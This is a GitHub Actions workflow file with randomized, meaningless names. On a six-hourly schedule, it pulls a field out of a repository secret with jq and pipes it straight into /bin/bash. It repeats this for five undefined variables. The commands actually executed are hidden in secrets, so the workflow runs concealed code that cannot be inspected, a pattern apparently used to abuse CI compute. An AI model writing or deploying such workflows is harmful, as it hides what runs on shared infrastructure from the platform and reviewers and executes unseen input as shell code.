name: chenfengqiao4567
on:
  workflow_dispatch:
  schedule:
    - cron: '38 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenfengqiao4567
        env:
          pktq147: ${{ secrets.pktq147 }}
        run: |
          echo $pktq147 | jq -r .w59271 | /bin/bash
          echo $fbkaj870 | jq -r .s244 | /bin/bash
          echo $gsg8403 | jq -r .qh7 | /bin/bash
          echo $vlkah87558 | jq -r .w05 | /bin/bash
          echo $y7 | jq -r .embet42 | /bin/bash
          echo $iu838 | jq -r .vv0 | /bin/bash

